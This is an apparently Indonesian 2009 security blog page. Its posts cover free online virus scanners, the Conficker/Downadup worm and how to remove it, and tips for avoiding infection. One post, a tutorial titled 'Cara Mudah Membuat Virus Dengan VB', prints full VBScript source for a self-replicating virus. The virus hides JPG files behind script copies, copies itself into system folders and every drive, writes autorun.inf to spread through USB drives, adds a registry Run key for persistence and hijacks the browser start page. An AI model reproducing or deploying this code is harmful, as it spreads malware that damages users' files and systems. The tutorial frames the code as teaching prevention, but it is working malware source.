Profile Facebook Twitter My Space Friendster Friendfeed You Tube
Kompas Tempo Detiknews
Google Yahoo MSN
Blue Sky Simple News Simple News R.1 Simple News R.2 Simple News R.3 Simple News R.4

About Author »

Free File Hosting Service»

My Blog Feeds »

  • Zoom Magazine is one of magazine Blogger template. Simple elegant with dropdown menu, image slide show and more...
  • Zoom Magazine adalah salah satu template blogger bergaya majalah. Silahkan ketik judul dan keterangan gambar anda disini...

Tuesday, 17 March 2009 | 00:24 | 2 Comments

8 Free Online Virus and Spyware Scanners to Protect Your PC

Keeping your computer safe and secure these days can be quite a task. It seems that everywhere you look, people are trying to steal your personal data, infect your computer with a nasty virus, or trick you into clicking links that aren’t legitimate. As you are probably using your computer to tackle a number of increasingly personal tasks, it’s more important than ever to make sure you’re protected. If you’ve ever been a victim of a devastating virus that wiped out your hard drive or received a strange email that secretly emailed all of your contacts, you know the importance of keeping your PC safe.

While there’s no substitute for an updated real-time virus scanner installed on your computer, there are times when you may not have antivirus software installed, or it may be costly to purchase an additional license for a computer that isn’t often used. So, luckily there are many free online scan utilities out there available to you. In addition to being completely free and easy to use, you’ll also get a feel for how many of the different types of programs work. If you’re thinking about purchasing antivirus software for your computer, you can get a better idea of which one might be best for you after trying the online versions.

Trend Micro HouseCall


Trend Micro HouseCall is an online application for checking whether your computer has been infected by viruses, spyware, or other malware. HouseCall performs additional security checks to identify and fix vulnerabilities to prevent reinfection. HouseCall works with most versions of Windows, and Mac OS 10.4 or higher and can be used with IE 6+ and Firefox. Scan your computer with HouseCall now.

BitDefender


BitDefender Online Scanner is an on-demand virus scanner which incorporates the award-winning BitDefender scanning engines. You can use it to scan your system’s memory, all files and drives’ boot sectors, and to automatically clean infected files. You will need Internet Explorer to run this scan. Use BitDefender today.

Symantec Norton Security Scan


Symantec offers two different scanning options. You can scan for security problems or just do a virus scan. In addition, you can also opt to download a free version of the basic software to your computer so it runs automatically without requiring you to go online and manually run the scan. You will need IE 5+ with ActiveX in order to run the online version. Try Symantec now.

F-Secure Online Scanner


F-Secure Online Virus Scanner is a free service. Use it to find out if your computer is infected, and disinfect your computer if needed. To use this scan, you will need to be running Windows and use Internet Explorer with javascript and ActiveX installed. In addition to the online virus scan, you may find the F-Secure Health Check useful as well. The health check will scan your computer and applications to determine if there are any outdated software or other vulnerabilities detected. Use the F-Secure online virus scanner.

McAfee Free Scan


McAfee FreeScan helps you detect thousands of viruses on your computer. Based on the award-winning McAfee VirusScan engine, FreeScan searches for viruses, including the latest known “in the wild” viruses, and displays a detailed list of any infected files. Should viruses be found, FreeScan even provides links to more information about the viruses and what you can do to clean your system. Try McAfee Free Scan now.

CA Online Virus Scan


Similar to the other scanners, this is a quick online tool that can scan your files for harmful files. The tool allows you to select specific drives or files if you don’t want to scan your entire computer, which is great if you just need to run a quick scan on something in particular. This tool also requires IE with ActiveX installed. Try the CA virus scanner today.

ESET Nod32 Antivirus


The ESET Online Scanner claims to be the best free virus scan. “A user-friendly, powerful tool, our online antivirus utility can remove malware—viruses, spyware, adware, worms, trojans, and more—from any PC utilizing only a web browser. No installation required. The scanner uses the same ThreatSense® technology and signatures as ESET NOD32 Antivirus, which means it is always up-to-date.” I personally use NOD32 as my personal scanner and have purchased their scanning software. The online version does require IE with ActiveX. Try the free online scan now.

Panda ActiveScan


Panda’s ActiveScan is a robust online virus and malware scanner that goes beyond most conventional scanners. Collective Intelligence (scanning in-the-cloud) that detects malware that traditional security solutions cannot detect. If you create a free user account, you can also create custom scans and access your scan history. And even better, this is one of the few online scanners that will work with Firefox. Try Panda’s ActiveScan today.

Cara Mudah Membuat Virus Dengan VB

Virus komputer merupakan program komputer yang dapat menggandakan atau menyalin dirinya sendiri dan menyebar dengan cara menyisipkan salinan dirinya ke dalam program atau dokumen lain. Virus komputer dapat dianalogikan dengan virus biologis yang menyebar dengan cara menyisipkan dirinya sendiri ke sel makhluk hidup. Virus komputer dapat merusak (misalnya dengan merusak data pada dokumen), membuat pengguna komputer merasa terganggu, maupun tidak menimbulkan efek sama sekali. Virus yang akan kita coba buat kali ini akan dibuat dengan menggunakan Visual Basic Script. Terlebih dulu kira akan rencakan skenario kerja dari virus tersebut. Skenario virus tersebut adalah sebagai berikut:
  1. Virus akan mencari file-file .JPG pada folder dan subfolder satu tingkat didalamnya, setelah itu merubah ekstension file JPG tersebut menjadi JPEG dan merubah atributnya menjadi hidden file. Sehingga akan dikira file tersebut terhapus.
  2. Meng-copy-kan dirinya (virus) dalam folder-folder tertentu dalam Windows
  3. Memodifikasi Registry agar secara otomatis menjalankan script virus pada saat restart
  4. Menularkan diri pada drive-drive yang aktif termasuk flash disk.
  5. Membuat halaman HTML tertentu agar dijalankan pada start page di Internet Explorer
Nah, demikianlah skenario virus yang akan kita buat. Untuk lebih jelasnya kita akan pelajari dari script dibawah ini:

1. Pada bagian ini akan dibuat sebuah prosedur untuk mencari file-file JPG dan merubahnya sesuai dengan skenario diatas
Sub serangan_jpg(target)
on error resume next
set ftarget=fso.GetFile(target)
set fsource = fso.GetFile(Wscript.ScriptFullName)
ftarget.Copy(Left(target,instrrev(target,”.”)) & “jpeg”)
set fbackup = fso.GetFile(Left(target,instrrev(target,”.”)) & “jpeg”)
fbackup.Attributes = 2 fsource.Copy(Left(target,instrrev(target,”.”)) & “jpg ” & “.vbs”)
ftarget.Delete
ftarget.Close
fsource.Close
End Sub
Sub carifilejpg(folder)
For Each filetarget in fso.GetFolder(folder).Files
If (Right(filetarget,3)=”jpg”) then serangan_jpg(filetarget)
Next
End Sub


2. Prosedur dibawah ini berfungsi untuk mencari drive yang aktif termasuk media flash disk dan kemudian menularinya.
Sub serangan_drive()
Set fso = CreateObject(”Scripting.FileSystemObject”)
Set Drives=fso.drives
adaflashdisk = False
For Each drive in Drives
If drive.isready Then
fsource.Copy(drive & “” & “wolio.vbs”)
If drive.DriveType = 1 And drive.DriveLetter> “C:” Then adaflashdisk = True
End If
Next
If adaflashdisk = True Then
set fileautorun = fso.CreateTextFile(drive.DriveLetter & “” & “autorun.inf”,False)
fileautorun.WriteLine(”[AUTORUN]“)
fileautorun.WriteLine(”RUN=wolio.vbs”)
End If
End Sub


3. Merubah Registry agar Start Page pada Internet Explorer menjalankan file HTML yang diinginkan.
Sub serangan_ie()
If (regedit.RegRead(”HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
Page”)<>”c:windowssystem32wolio.html”) Then
regedit.RegWrite “HKEY_CURRENT_USERSOFTWAREMicrosoftInternet ExplorerMainStart
Page”,”c:windowssystem32wolio.html”
End If
End Sub


4. Bagian ini digunakan untuk membuat sebuah file HTML yang akan menjalankan script virus
Sub buat_html()
set filehtml = fso.CreateTextFile(”c:windowssystem32wolio.html”,True)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
“)
filehtml.WriteLine(”Welcome to Wolio”)
filehtml.WriteLine(”filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
filehtml.WriteLine(”Selamat Datang di Wolio VBS “)
filehtml.WriteLine(””)
filehtml.WriteLine(””)
End Sub


5. Pada bagian ini akan mencari folder yang ada dan menularinya dengan script virus
Sub serangan_folder(foldername)
on error resume next


For Each subfolder in fso.GetFolder(foldername).SubFolders
fsource.Copy(subfolder & “wolio.vbs”)
carifilejpg(subfolder)
next
End Sub

6. Bagian dibawah ini adalah bagian yang utama gunanya untuk mendeklarasikan variabel dan memangggil semua prosedur
on error resume next
dim fso, fsource, ftarget, fbackup, scriptname, myfolder, subfolder, preview, filetarget, sys, regedit, drive,
filehtml, fileautorun
dim adaflashdisk


set fso = CreateObject(”Scripting.FileSystemObject”)
set fsource = fso.GetFile(Wscript.ScriptFullName)
set regedit=CreateObject(”WScript.Shell”)

myfolder = Left(fsource,InStrRev(fsource,””))
‘ Copy-kan diri ke “c:windowssystem32″

fsource.Copy(”c:windowssystem32wolio.vbs”)
‘ Cari dan infeksi file JPG didalam folder
carifilejpg(myfolder)
‘ Copy-kan diri di sub folder yang ada
serangan_folder(myfolder)
‘ Regitry
if
(regedit.RegRead(”HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”)<>”c:win
dowssystem32wolio.vbs”) Then
regedit.RegWrite
“HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRunWolio”,”c:windowssystem32wolio.
vbs”
End If
‘ Copy-kan diri ke semua drive aktif
serangan_drive()
‘ Buat file wolio.html
buat_html()
‘ Ubah Start Page di Internet Explorer
serangan_ie()

Demikianlah artikel tentang cara pembuatan dan penuluran sebuah virus yang dibuat dengan VBS. Setelah mengetahui teknik penyebaran suatu virus yang dibuat dengan VBS, maka diharapkan kepada Anda agar dapat melakukan pencegahan. Virus yang kita pelajari kali ini sebenarnya hanya virus yang “bodoh”, ini hanya membuka wacana Anda terhadap bahaya dari virus yang dibuat dengan VBS. Semoga artikel ini dapat bermanfaat.

Monday, 16 March 2009 | 23:48 | 0 Comments

Dangerous Worm Eating 1 Million PC in 24 Hours


All types of PC have the same enemy that is a virus, trojan, worm. If your PC using Windows software, so be careful with attacks from the worm called "Downadup". This worm is able to destroy more than one million Windows PC in 24 hours.

This Worm is also called "Conficker". It’s exploit a bug in the Windows Server service that used in all versions of Microsoft operating systems, such as Windows 2000, XP, Vista, Server 2003 and Server 2008. 

Finnish security company, F-Secure, estimates that the number of PCs who infected with worm called "Downadup" is now increased from the previous number of 2.4 million to 3.5 million.

Until now, the largest number of infections occur in the United States, Canada, Mexico, Korea, and some European countries, including English, French and German.

9 Step to Remove W32.Downadup.B Virus

W32.Downadup.B Virus was discovered by Symantec last December 30, 2008, and was announce to public January 9, 2009. Now it widely spreading all over the world and it floodings network connections.

This virus monitors DNS requests to domains containing certain strings and blocks access to those domains so that it will appear that the network request timed out. We (my MIS Team) discovered W32.Downadup.B Virus from our quarantine logs and we found out that it was introduce to the network using a USB drive activated by autorun.inf.

W32.Downadup.B creates an autorun.inf file on all mapped drives so that the threat automatically executes when the drive is accessed. The threat then monitors for drives that are connected to the compromised computer in order to create an autorun.inf file as soon as the drive becomes accessible.

You won’t be able to detect it using the command prompt because it run by using the RPC Handling Remote Code Execution. How to remove the virus just follow the steps below:

  1. Download the removal tool from Symantec website and place it on your desktop.
  2. Download the Security patch from microsoft website. ( Choose the file support with your OS). for Windows XP (KB958644)
  3. Temporarily Disable System Restore (Windows Me/XP).
  4. ​​​Update the virus definitions (If your using Symantec).
  5. Reboot your computer in SafeMode.
  6. Run the FixDownadup.exe that you have just downloaded and let it scan until it found a viruses.
  7. Run the Security Patch.
  8. Reboot your system in normal mode and run the Full System Scan to make sure that no virus present on your computer.
  9. As preventive measure We disabled autorun in the registry and disable USB Port access to all workstation.

Tuesday, 30 December 2008 | 22:32 | 0 Comments

Tips On Avoiding Virus Infection

  1. Install anti-virus software from a well-known, reputable company, UPDATE it regularly, and USE it regularly. New viruses come out every single day; an a-v program that hasn't been updated for several months will not provide much protection against current viruses.
  2. In addition to scanning for viruses on a regular basis, install an 'on access' scanner (included in most good a-v software packages) and configure it to start automatically each time you boot your system. This will protect your system by checking for viruses each time your computer accesses an executable file.
  3. Virus scan any new programs or other files that may contain executable code before you run or open them, no matter where they come from. There have been cases of commercially distributed floppy disks and CD-ROMs spreading virus infections.
  4. Anti-virus programs aren't very good at detecting Trojan horse programs, so be extremely careful about opening binary files and Word/Excel documents from unknown or 'dubious' sources. This includes posts in binary newsgroups, downloads from web/ftp sites that aren't well-known or don't have a good reputation, and executable files unexpectedly received as attachments to E-mail or during an on-line chat session.
  5. If your E-mail or news software has the ability to automatically execute JavaScript, Word macros, or other executable code contained in or attached to a message, I strongly recommend that you disable this feature.
  6. Be _extremely_ careful about accepting programs or other files during on-line chat sessions: this seems to be one of the more common means that people wind up with virus or Trojan horse problems. And if any other family members (especially younger ones) use the computer, make sure they know not to accept any files while using chat.
  7. Do regular backups. Some viruses and Trojan horse programs will erase or corrupt files on your hard drive, and a recent backup may be the only way to recover your data.
Ideally, you should back up your entire system on a regular basis. If this isn't practical, at least backup files that you can't afford to lose or that would be difficult to replace: documents, bookmark files, address books, important E-mail, etc.
 

Poll

Poll

Pengikut

Copyright © 2010 - All right reserved | Template design by Herdiansyah Hamzah | Published by Jurnalborneo.com
Proudly powered by Blogger.com | Best view on mozilla, internet explore, google crome and opera.